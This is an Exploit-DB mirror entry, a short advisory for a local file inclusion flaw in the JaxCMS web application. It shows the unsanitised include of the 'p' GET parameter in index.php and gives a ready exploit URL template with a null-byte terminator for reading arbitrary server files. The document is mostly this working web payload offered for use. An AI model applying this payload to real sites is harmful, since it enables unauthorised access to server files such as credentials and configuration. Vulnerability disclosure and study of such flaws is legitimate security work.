exploit-db-mirror/exploits/php/webapps/11359.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
375 B
Text

/*
Name : JaxCMS (p) Local File Include
WebSite : http://www.pixiescripts.com/
Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com<mailto:mizozx@gmail.com>
Greetz : Zuka !
*/
The vulnerability is in the get $_GET['p'] , the index.php include '/pages/'.$_GET['p'].'.php'
So we can read any file in the server .
EXPLOIT :
http://server/[JaxCMS PATH]/index.php?p=[LFI]%00